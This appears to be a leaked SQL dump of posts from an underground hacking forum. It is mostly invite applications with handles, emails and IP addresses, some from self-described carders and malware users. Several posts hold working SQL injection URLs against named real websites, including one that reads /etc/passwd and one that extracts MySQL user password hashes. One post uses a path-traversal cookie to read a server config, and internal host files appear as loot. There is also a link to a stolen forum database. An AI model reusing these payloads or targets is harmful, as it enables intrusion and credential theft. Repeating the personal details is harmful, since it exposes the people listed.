3b7ef9a7e75f76560c2efabab15e4af76974dfd9 | rlogan | r\r\n|\r\n| 5b945a43d7b109b61523b40f8126d455946c4cd4 | mackrawden | ae\r\n|\r\n| 654c3e776acf7cfb4f60c617019dfc34a37d7829 | fpop | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rjohngormanRETIRED | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rRETIRED - ian | r\r\n|\r\n| 46e696b38179763eaf314ae5bcaa2895cd4a4756 | steve | r\r\n|\r\n| 1b90f7d3f7945247d1d68c97da97c711df6f73d3 | williamusher | se\r\n|\r\n| 022fb76872f91a9926247733002cea3a70f13bee | rmusic | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rkonagallagher | r\r\n|\r\n| 76cb0d5f48822cf48fc58c7019496b10115bf029 | rtv | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rjoshspiegel | r\r\n|\r\n| 53aad0ab6bd1a010308b5bc300c913b5e3e1ea3a | rbrianholcomb | w\r\n|\r\n| 888ebcfac35fe9957b0885e85f17cfdd25f53197 | rtech | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rRETIREDdanielsolomon | w\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rcharmaindennis | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rmarceastman | w\r\n|\r\n| befa372d104a687b5acc35508ec5ac2e01751938 | rperrinemiroff | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | remilymcdonald | wr\r\n|\r\n| ffecf2903c92276525634932aebf3d1dc4974849 | zblank | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | randykeener | r\r\n|\r\n| 272a7e18d8decab812805fda168493fa5604bbe6 | dougnorrie | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rryanrigney | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rtimgomez | wr\r\n|\r\n| 4f8cf4317e7f5a49b8ec2869b209549de824f56a | rrpeterclines | w\r\n|\r\n| 09c69e6a2e18cc7d5fa9bc5586c1599fc9b213cc | nicvenable | se\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjasonhughes | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rrobinburdge | w\r\n|\r\n| ee1231ac17bfc9d2f9fd4d7876d323454c97b8d0 | rwillleblanc | wr\r\n|\r\n| 1701dd9b7472358c48ca0e699b8043e262c468c8 | ericeisenberg | ae\r\n|\r\n| e7f0c227cb5ef72d8edd8add05db6d9191af930d | jessecarpe | wr\r\n|\r\n| e1281c7f48bafd243b0551d895e00d513d1fa7d2 | rJacobASundstrom | r\r\n|\r\n| 96e2a411f3e3fad44bbe34b1edc226a6dafaa7f4 | rblank | r\r\n|\r\n| e6566eaf5a1810629a035d28aacc30f3fa064b74 | rJohnElliot | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rAndrewStewart | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rMikelaFloyd | r\r\n|\r\n| 5b4f1187e8d3554ad20e2f1946d453dd26a975df | rPatrickHodges | r\r\n|\r\n| 5212cce5ae4b2d601f88803810dd2298b6033912 | sean | ae\r\n|\r\n| 0264c025906e9442cc770648a897b30644ace6ff | josephgiannone | r\r\n|\r\n| 23c816ba47c09254c55a67e3525aa6c2ea70e31d | rmelissaduko | r\r\n|\r\n| c7953e988b5e8fd1dbebb3417451fb6e25062be4 | zacharyscheer | w\r\n|\r\n| 7449a2bed195073a29d7303801d5f92248c6c6fa | RETIRED lesliekasperowicz | r\r\n|\r\n| 1ff6aaf2af9b7c165c5f34b94e0b572193c353c0 | rscottheisel | r\r\n|\r\n| 162a0b0498d7bb37e61dd5a49bc7ee4fcb99948a | rmikemoody | r\r\n|\r\n| 29220f2165747f78c2032b8eb493d5c282608192 | rbriansalisbury | r\r\n|\r\n| ab24d1a73869567142723b272d79309214e6a219 | retiredcarrie | wr\r\n|\r\n| cb329cf93f64b596bc72241ce38ce404a7aa7e72 | kristypuchko | wr\r\n|\r\n| 3958916a359fe28e623c6236c950da3bc826351d | amydeline | re\r\n|\r\n| 8b597cb96ac9a27081fb83b1538bb2af3f485195 | remattpatches | wr\r\n|\r\n| dda7d2c914a6ec7cf5df9b49f2171500f8af4a8c | redavidehrlich | wr\r\n|\r\n| 7121cbefa6855442dec2b33466d67574f28d9b28 | reda7egonzales | wr\r\n|\r\n| 51dc70e30e36ea6b03ff7462b11cde579fd15af5 | face3 | a\r\n|\r\n| d146191f5a8e309d86db1e188881bf5ff5f6b338 | Rzakislam | wr\r\n|\r\n| 65767013093051f57080d37457a24a2e37bf324d | ryanwinslett | wr\r\n|\r\n| 5f578eb4539aaae067ed803c937d2ed8742f48f9 | handynet | r\r\n|\r\n| 3af192171fece6f52ebe9bd22521a485712b54a7 | rbrittahanson | wr\r\n|\r\n| 700f1088dda4ea78d0dab6876d8cd7b430b2e6d0 | RETIRED - ryangowland | r\r\n|\r\n| 053c579ed61bbf59dd5c40ed56fa9509d3805b01 | alicialutes | se\r\n|\r\n| a6748ccbb0618bb4fc5f267f0441f97676376e91 | gabrieltoro | wr\r\n|\r\n| 7b1e6f8859c5d269d282800b5cb5b8b68c077f0f | ralexsuskind | wr\r\n|\r\n| 3e43b3813fc5a846a350fad1dab6895a8fb63865 | mikereyes | wr\r\n|\r\n| 6101307044ab5d8e84a4ab8a5362d7d9091e9416 | courtneyflannery | r\r\n|\r\n| 5af77a048b5c6bc81c00eab2683e8dd0c424b028 | mickjoest | r\r\n|\r\n| 495f89c14c1fba8ec0005b114056a59ee2c0cb3f | blankt435t5yopu89 | r\r\n|\r\n+------------------------------------------+---------------------------+-------', 1, 0, '37.235.62.127', 0, 1, 0, 0, 0),
(1234, 1067, 1086, 'Psych0tr1a', 11, '', 1405068941, 'üуÑÂúуû ÿþôýÑÂûø. ÿþüþóøтõ шõûû ÷ðûøть ÿûø÷.', 1, 0, '91.78.172.29', 0, 1, 0, 0, 0),
(1235, 1143, 0, 'Invite', 2, 'New invite', 1405100097, '[b]Name[/b]: samirsamo123@\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: samirsamo123@jabber.com\r\n [b]e-mail[/b]: samirsamo123@jabber.com\r\n [b]Info[/b]: ddddddddddddddddddddddddddddddddddddddddddddddd .', 1, 0, '213.207.61.39', 0, 1, 0, 0, 0),
(1236, 1067, 1086, 'kx00', 6, '', 1405111094, '[QUOTE=Psych0tr1a;1086][B]SQL injection[/B]\n[code]http://g4.thaimail.com/new/market/sub_category.php?cateID=999999999.9+union+select+1,2,user(),4,5,6,7,8+--+[/code]\n\nuser()=root@localhost\nFile_Priv=Y\n\nÃÂþ ÑÂãÚàMAGIC QUOTES = ON\n\n[/QUOTE]\n\nÒðрøðýт þñхþôð MAGIC QUOTES = ON\n_ttp://g4.thaimail.com/new/market/sub_category.php?cateID=999999999.9+union+select+1,2,concat(0x7e,0x27,load_file(0x2f6574632f706173737764),0x27,0x7e),4,5,6,7,8+--+\n\n\näðùû /etc/hosts ýð g4.thaimail.com\n[CODE]\n# $FreeBSD: src/etc/hosts,v 1.16 2003/01/28 21:29:23 dbaker Exp $\n#\n# Host Database\n#\n# This file should contain the addresses and aliases for local hosts that\n# share this file. Replace \'my.domain\' below with the domainname of your\n# machine.\n#\n# In the presence of the domain name service or NIS, this file may\n# not be consulted at all; see /etc/nsswitch.conf for the resolution order.\n#\n#\n::1 localhost localhost.my.domain\n127.0.0.1 localhost localhost.my.domain\n#\n# Imaginary network.\n#10.0.0.2 myname.my.domain myname\n#10.0.0.3 myfriend.my.domain myfriend\n#\n# According to RFC 1918, you can use the following IP networks for\n# private nets which will never be connected to the Internet:\n#\n# 10.0.0.0 - 10.255.255.255\n# 172.16.0.0 - 172.31.255.255\n# 192.168.0.0 - 192.168.255.255\n#\n# In case you want to be able to connect to the Internet, you need\n# real official assigned numbers. Do not try to invent your own network\n# numbers but instead get one from your network provider (if any) or\n# from your regional registry (ARIN, APNIC, LACNIC, RIPE NCC, or AfriNIC.)\n#\n192.168.110.8 g4.thaimail.intra g4\n203.148.250.170 g4.thaimail.com\n192.168.110.1 g1.thaimail.intra g1\n192.168.110.11 db.thaimail.intra db\n192.168.110.7 g2.thaimail.intra g2\n192.168.110.201 st1.thaimail.intra st1\n192.168.110.202 st2.thaimail.intra st2\n[/CODE]\näðùû /etc/hosts ýð ÑÂõрòõрõ ñð÷ы MySQL\n[CODE]\n# $FreeBSD: src/etc/hosts,v 1.16.32.1 2009/04/15 03:14:26 kensmith Exp $\n#\n# Host Database\n#\n# This file should contain the addresses and aliases for local hosts that\n# share this file. Replace \'my.domain\' below with the domainname of your\n# machine.\n#\n# In the presence of the domain name service or NIS, this file may\n# not be consulted at all; see /etc/nsswitch.conf for the resolution order.\n#\n#\n::1 localhost localhost.my.domain\n127.0.0.1 localhost localhost.my.domain\n192.168.110.11 db1 db1.thaimail.intra\n\n#\n# Imaginary network.\n#10.0.0.2 myname.my.domain myname\n#10.0.0.3 myfriend.my.domain myfriend\n#\n# According to RFC 1918, you can use the following IP networks for\n# private nets which will never be connected to the Internet:\n#\n# 10.0.0.0 - 10.255.255.255\n# 172.16.0.0 - 172.31.255.255\n# 192.168.0.0 - 192.168.255.255\n#\n# In case you want to be able to connect to the Internet, you need\n# real official assigned numbers. Do not try to invent your own network\n# numbers but instead get one from your network provider (if any) or\n# from your regional registry (ARIN, APNIC, LACNIC, RIPE NCC, or AfriNIC.)\n#\n[/CODE]\nшõûû чõрõ÷ SQLi þтÿðôðõт ýуöýþ úрутøть чõрõ÷ LFI. \nßутø ú ûþóðü ýуöýы.', 1, 1, '5.57.14.216', 0, 1, 0, 0, 0),
(1237, 1067, 1236, 'kx00', 6, '', 1405115800, '[CODE]GET http://g4.thaimail.com/index-top.php?auth_error=-4&backto= HTTP/1.1\r\nHost: g4.thaimail.com\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\nConnection: close\r\nCookie: CGateProWebUser=xd6GxdzQFgwbtBuaLkRe; PHPSESSID=nvmqhg7o4glsltq1g16u53dl27; theme=../../../../../../usr/local/etc/apache22/httpd.conf%00; lang=th_TH; cookie_test_1=test; cookie_test_2=test[/CODE]\r\n\r\nCustomLog \"|/usr/local/sbin/rotatelogs /var/log/httpd-access.log.%Y%m%d 86400\" common<= рþтðцøѠûþóþò. ÿõчðûь.\r\nErrorLog /var/log/httpd-error.log\r\n/etc/newsyslog.conf чтþ-тþ òþ÷üþöýþ ÿþûõ÷ýþõ...', 1, 1, '5.57.14.216', 0, 1, 0, 0, 0),
(1238, 1144, 0, 'Invite', 2, 'New invite', 1405264488, '[b]Name[/b]: LeNo\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: l3n0@darkode.com\r\n [b]e-mail[/b]: xgurux@outlook.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '182.64.238.177', 0, 1, 0, 0, 0),
(1239, 1145, 0, 'w0rm', 1, '.blackhatworld.com', 1405265072, '[url]http://www.blackhatworld.com/blackhat-seo/forum.php[/url]\n\ndownload:[url]https://cloud.mail.ru/public/0530624c3e21/black.sql[/url][URL=\"https://cloud.mail.ru/public/0530624c3e21/black.sql\"][/URL]', 1, 0, '178.45.207.171', 0, 1, 0, 0, 0),
(1240, 1146, 0, 'Invite', 2, 'New invite', 1405276155, '[b]Name[/b]: Rome0\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: Rome0@143biz.cc\r\n [b]e-mail[/b]: anonymous13@hush.com\r\n [b]Info[/b]: Hello , i am Rome0 , well know seller of dumps in many forum .\r\nMostly work on Pos malware and real carding sh!!t \r\nWish some of us know me and can vouch me into w0rm .', 1, 0, '94.242.198.91', 0, 1, 0, 0, 0),
(1241, 1147, 0, 'Invite', 2, 'New invite', 1405277915, '[b]Name[/b]: badboy\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: mi1im@jabber.cz\r\n [b]e-mail[/b]: pham1331@yahoo.com\r\n [b]Info[/b]: Hello, I am around underground since 2006 back in days of m00/DHG russian underground stuff. Was/am registered on the forums vendors(DC now) darkode. Retired from big hacking for few years, buying selling information and converting oppratunity into $.\r\nbadboy is darkode nickname altho I do not have presistant one.\r\n\r\nRegards. .', 1, 0, '178.254.218.116', 0, 1, 0, 0, 0),
(1242, 1148, 0, 'Invite', 2, 'New invite', 1405324090, '[b]Name[/b]: scrack\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 2435678\r\n [b]e-mail[/b]: sean.collins43@yahoo.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '186.150.15.127', 0, 1, 0, 0, 0),
(1243, 1149, 0, 'Invite', 2, 'New invite', 1405324593, '[b]Name[/b]: johnnyb\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: johnnyb@exploit.im\r\n [b]e-mail[/b]: johnnyb2014@mailinator.com\r\n [b]Info[/b]: I am skilled with exploit kits, use of web exploits and malware. I am interested in buying DBs of various types from people..', 1, 0, '111.90.159.40', 0, 1, 0, 0, 0),
(1244, 1150, 0, 'Invite', 2, 'New invite', 1405358185, '[b]Name[/b]: a7515887\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 2322\r\n [b]e-mail[/b]: a7515887@drdrb.net\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '108.59.11.116', 0, 1, 0, 0, 0),
(1246, 1067, 1237, 'Psych0tr1a', 11, '', 1405414697, 'çøтðù ôðûõõ тðü õÑÂть ÑÂúуÃȄʄÂûõÿðѠчõрõ÷ úþтþрую üþöýþ ÷ðûøтьÑÂÑÂ. тðú úðú MQ = off\r\n ÃÂþ ýуöýы õщё ÿðÿúø.', 1, 0, '79.139.175.194', 0, 1, 0, 0, 0),
(1247, 1152, 0, 'Invite', 2, 'New invite', 1405462166, '[b]Name[/b]: main5tream\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 396419\r\n [b]e-mail[/b]: main5tream@secure-mail.biz\r\n [b]Info[/b]: Ex-Smod Hackerzhub\r\nEx-Admin @ Hackbase\r\nAdmin @ UniqueCrew\r\n\r\nI am Admin of the biggest hacking security linkbase of the world :\r\n\r\nlink-base.org\r\n\r\nand websec blog\r\n\r\nhttps://blog.yakuza112.org/\r\n\r\nSkills\r\n\r\nWebpsec/ some PHP / c++ / vb.net knowledge,pawno coding, Malware, WordPress, Linux\r\n\r\nI am team member @ Emsisoft.com (officialy \\\"Tester\\\" of new products ).', 1, 0, '93.228.132.63', 0, 1, 0, 0, 0),
(1248, 1153, 0, 'Invite', 2, 'New invite', 1405484713, '[b]Name[/b]: illuminati\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: mastermind@jabber.se\r\n [b]e-mail[/b]: kappel86@gmx.ch\r\n [b]Info[/b]: I\\\'m an Entrepreneur who liked Captain Power and the Soldiers of the Future. ;).', 1, 0, '108.61.210.77', 0, 1, 0, 0, 0),
(1249, 1154, 0, 'Invite', 2, 'New invite', 1405489446, '[b]Name[/b]: h4\\\\\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: -_-\r\n [b]e-mail[/b]: jameszartjzart@hotmail.com\r\n [b]Info[/b]: i don\\\'t get what you want really to know but all i know i have some customers and you have something to sell so i would like to join you to see how we can do business also i\\\'m expert in this field so i can easily determine fake vulnerability from real one from range of simple reflected XSS in 4 line cms to remote windows kernel pool exploit ;) let\\\'s see what you got guys ....', 1, 0, '124.120.17.19', 0, 1, 0, 0, 0),
(1250, 1155, 0, 'Invite', 2, 'New invite', 1405489511, '[b]Name[/b]: \\\"> \r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: dsds\r\n [b]e-mail[/b]: maziangamy@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '197.34.213.0', 0, 1, 0, 0, 0),
(1251, 1156, 0, 'Invite', 2, 'New invite', 1405491189, '[b]Name[/b]: codezap\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: codetda@gmail.com\r\n [b]e-mail[/b]: codetda@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '59.184.162.142', 0, 1, 0, 0, 0),
(1252, 1157, 0, 'Invite', 2, 'New invite', 1405491266, '[b]Name[/b]: codezap\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: codetda@gmail.com\r\n [b]e-mail[/b]: codetda@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '59.184.162.142', 0, 1, 0, 0, 0),
(1253, 1158, 0, 'Invite', 2, 'New invite', 1405491360, '[b]Name[/b]: codezap\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: codetda@gmail.com\r\n [b]e-mail[/b]: codetda@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '59.184.162.142', 0, 1, 0, 0, 0),
(1254, 1159, 0, 'Invite', 2, 'New invite', 1405491394, '[b]Name[/b]: MadHunteR\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: iso.saygili@hotmail.com\r\n [b]Info[/b]: I am Information Security Researcher. I am interested cyber security, python etc..', 1, 0, '31.145.29.42', 0, 1, 0, 0, 0),
(1255, 1160, 0, 'Invite', 2, 'New invite', 1405499640, '[b]Name[/b]: Mr NoRvI\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: jccnfd@jaber.com\r\n [b]e-mail[/b]: bohr4me@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '41.100.226.161', 0, 1, 0, 0, 0),
(1256, 1161, 0, 'Invite', 2, 'New invite', 1405499664, '[b]Name[/b]: pouet\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: pouet@bi.tk\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '90.15.219.44', 0, 1, 0, 0, 0),
(1257, 1162, 0, 'Invite', 2, 'New invite', 1405500092, '[b]Name[/b]: mombay\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 321321\r\n [b]e-mail[/b]: sec_contact@yahoo.com\r\n [b]Info[/b]: PHP, HTML5, JQUERY/JAVASCRIPT, CSS3, ACTIONSCRIPT developer.\r\n\r\nSQLi, LFI, RFI, BUFFER OVERFLOW Maitrise\r\n .', 1, 0, '41.103.172.161', 0, 1, 0, 0, 0),
(1258, 1163, 0, 'Invite', 2, 'New invite', 1405501156, '[b]Name[/b]: jhN\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: private@jabber.at\r\n [b]e-mail[/b]: joaomvarelas@gmail.com\r\n [b]Info[/b]: Hello, I am portuguese and I am 17 years old. I love everything that includes security. Back in 2006, when I had my first laptop, I used to play games and download stuff until I found an defaced website. I started to make a research about what was hacking and exploitation. The passion started. Now I am on the last year of the high school, and I will proceed to the college as Informatics Engineering. You can contact me through email, jabber, linkedin (https://www.linkedin.com/in/joaovarelas), twitter (https://twitter.com/joaovarelas) and facebook (https://www.facebook.com/x4ax4fx41x4f)\r\n\r\nHope we can do some projects together..', 1, 0, '89.155.83.222', 0, 1, 0, 0, 0),
(1259, 1164, 0, 'Invite', 2, 'New invite', 1405506077, '[b]Name[/b]: cc0de\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: cc0de@yahoo.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '105.111.33.239', 0, 1, 0, 0, 0),
(1260, 1165, 0, 'Invite', 2, 'New invite', 1405514463, '[b]Name[/b]: Eibich\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: teibich@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '87.189.248.199', 0, 1, 0, 0, 0),
(1261, 1166, 0, 'Invite', 2, 'New invite', 1405514521, '[b]Name[/b]: Pr0xY\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: fucked@asshole.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '144.76.196.70', 0, 1, 0, 0, 0),
(1262, 1167, 0, 'Invite', 2, 'New invite', 1405519391, '[b]Name[/b]: TestTest\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: NopeNope\r\n [b]e-mail[/b]: meagergimp@monumentmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '50.1.62.229', 0, 1, 0, 0, 0),
(1263, 1168, 0, 'Invite', 2, 'New invite', 1405520537, '[b]Name[/b]: ahmed\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: melod@xmpp.ru\r\n [b]e-mail[/b]: l2le@yahoo.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '151.238.101.218', 0, 1, 0, 0, 0),
(1264, 1169, 0, 'Invite', 2, 'New invite', 1405521353, '[b]Name[/b]: n4k3dal13n\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: n4k3dal13n@hotmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '72.38.35.22', 0, 1, 0, 0, 0),
(1265, 1170, 0, 'Invite', 2, 'New invite', 1405521899, '[b]Name[/b]: foxy\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: foxy.sec@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '37.8.46.122', 0, 1, 0, 0, 0),
(1266, 1171, 0, 'Invite', 2, 'New invite', 1405523367, '[b]Name[/b]: Nickname\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n .', 1, 0, '88.70.67.127', 0, 1, 0, 0, 0),
(1267, 1172, 0, 'Invite', 2, 'New invite', 1405523382, '[b]Name[/b]: Nickname\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n .', 1, 0, '88.70.67.127', 0, 1, 0, 0, 0),
(1268, 1173, 0, 'Invite', 2, 'New invite', 1405523389, '[b]Name[/b]: Nickname\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n .', 1, 0, '88.70.67.127', 0, 1, 0, 0, 0),
(1269, 1174, 0, 'Invite', 2, 'New invite', 1405529010, '[b]Name[/b]: samirsamo1337\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: i don have\r\n [b]e-mail[/b]: samirsamo123@hotmail.com\r\n [b]Info[/b]: c++ c# php ect is my passion.\r\nexpert in xss and rce..', 1, 0, '213.207.62.15', 0, 1, 0, 0, 0),
(1789, 1580, 0, 'Kingbeef', 3, 'ÃÂüð÷þý (ÿþôôþüõý)', 1408965280, 'MQ off\r\nFile_priv Y\r\n\r\n[CODE]http://ec2-54-243-253-27.compute-1.amazonaws.com/bscarddetails.php?cardID=9129+and+0+union+select+concat_ws(%27:%27,User,Password,File_priv)+from+mysql.user--+k[/CODE]', 1, 0, '', 0, 1, 0, 0, 0),
(1272, 1176, 0, 'Invite', 2, 'New invite', 1405531929, '[b]Name[/b]: rDNix\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: mynamemishal@gmail.com\r\n [b]e-mail[/b]: mynamemishal@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '199.255.211.60', 0, 1, 0, 0, 0),
(1273, 1177, 0, 'Invite', 2, 'New invite', 1405533837, '[b]Name[/b]: powersw\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 6578844\r\n [b]e-mail[/b]: powersw@hushmail.com\r\n [b]Info[/b]: sql injection knowledge very well\r\nworking for small pentest firm.', 1, 0, '46.123.28.128', 0, 1, 0, 0, 0),
(1274, 1178, 0, 'Invite', 2, 'New invite', 1405535637, '[b]Name[/b]: cyberdony2k\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: cyberdony2k@gmail.com\r\n [b]Info[/b]: I have expertise in reverse engineering and fuzzing. To be more specific, I have excellent skills of crash analysis on all the platforms(linux/windows/OS X). I have found bugs in browsers and OS X apps.\r\n .', 1, 0, '27.34.243.186', 0, 1, 0, 0, 0),
(1275, 1179, 0, 'Invite', 2, 'New invite', 1405536389, '[b]Name[/b]: lolwat\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: lolwat@notmailinator.com\r\n [b]Info[/b]: suck a dick, that\\\'s what..', 1, 0, '94.126.178.1', 0, 1, 0, 0, 0),
(1276, 1180, 0, 'Invite', 2, 'New invite', 1405539421, '[b]Name[/b]: kaourzi\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: kaourzi@yopmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '82.236.160.231', 0, 1, 0, 0, 0),
(1277, 1181, 0, 'Invite', 2, 'New invite', 1405578947, '[b]Name[/b]: i-Hmx\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: leetr1z\r\n [b]e-mail[/b]: n0p1337@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '197.223.248.202', 0, 1, 0, 0, 0),
(1278, 1182, 0, 'Invite', 2, 'New invite', 1405593955, '[b]Name[/b]: g0rx\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: g0r@jabber.dk\r\n [b]e-mail[/b]: g0rx@bk.ru\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '41.142.14.62', 0, 1, 0, 0, 0),
